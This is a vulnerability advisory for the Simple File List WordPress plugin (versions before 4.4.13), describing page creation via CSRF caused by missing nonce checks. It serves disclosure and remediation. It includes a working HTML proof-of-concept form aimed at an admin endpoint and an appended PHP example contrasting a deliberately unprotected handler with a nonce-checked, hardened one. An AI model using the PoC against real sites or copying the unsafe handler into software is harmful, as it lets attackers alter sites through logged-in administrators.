WPEX-ID: 80D475CA-B475-4789-8EEF-9C4D880853B7
Author: Raad Haddad of Cloudyrion GmbH
Published: Sep 19, 2022
Simple File List < 4.4.13 - Page Creation via CSRF


EPSS: 0.001 (Low), percentile 26.5%

The plugin does not implement nonce checks, which could allow attackers to make a logged-in admin create a new page and change its content via a CSRF attack.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php" method="POST">
      <input type="hidden" name="eeShortcode" value="Page Content" />
      <input type="hidden" name="eeCreatePostType" value="Page" />
      <input type="hidden" name="eeGo" value="Go" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
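As an added example that is not part of this advisory or of the plugin's code, the hypothetical handler below shows the missing-nonce pattern next to a hardened version using WordPress's own nonce and capability checks; the function, action and nonce names are assumptions, and only the form field names come from the PoC above.

```php
<?php
// Hypothetical handler for the form fields seen in the PoC above.
// Function, action and nonce names are assumptions, not the plugin's code.

// VULNERABLE PATTERN: acts on POST data with no nonce or capability check,
// so a form on any site an admin visits can create a page on their behalf.
function ee_handle_create_post_unsafe() {
    if ( isset( $_POST['eeGo'] ) && 'Go' === $_POST['eeGo'] ) {
        wp_insert_post( array(
            'post_type'    => strtolower( $_POST['eeCreatePostType'] ),
            'post_title'   => 'New page',
            'post_content' => $_POST['eeShortcode'],
            'post_status'  => 'publish',
        ) );
    }
}

// HARDENED PATTERN, part 1: the form must carry a nonce bound to this action.
function ee_render_create_post_form() {
    echo '<form method="post">';
    wp_nonce_field( 'ee_create_post', 'ee_create_post_nonce' );
    echo '<input type="hidden" name="eeCreatePostType" value="Page" />';
    echo '<input type="text" name="eeShortcode" />';
    echo '<input type="submit" name="eeGo" value="Go" />';
    echo '</form>';
}

// HARDENED PATTERN, part 2: verify nonce and capability before writing anything.
function ee_handle_create_post_safe() {
    if ( ! isset( $_POST['eeGo'] ) ) { return; }
    // wp_die()s if the nonce is missing, forged, expired, or was issued for a
    // different user or action; a cross-site form cannot supply a valid one.
    check_admin_referer( 'ee_create_post', 'ee_create_post_nonce' );
    // Restrict to the post types this feature is meant to create.
    $type = sanitize_key( wp_unslash( $_POST['eeCreatePostType'] ?? '' ) );
    if ( ! in_array( $type, array( 'page', 'post' ), true ) ) {
        wp_die( 'Unsupported post type.' );
    }
    if ( ! current_user_can( 'page' === $type ? 'publish_pages' : 'publish_posts' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    wp_insert_post( array(
        'post_type'    => $type,
        'post_title'   => 'New page',
        'post_content' => wp_kses_post( wp_unslash( $_POST['eeShortcode'] ?? '' ) ),
        'post_status'  => 'publish',
    ) );
}
```

The nonce is tied to the logged-in user's session and to the action name, so the PoC form above fails the check_admin_referer() call even when the victim is an authenticated admin.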

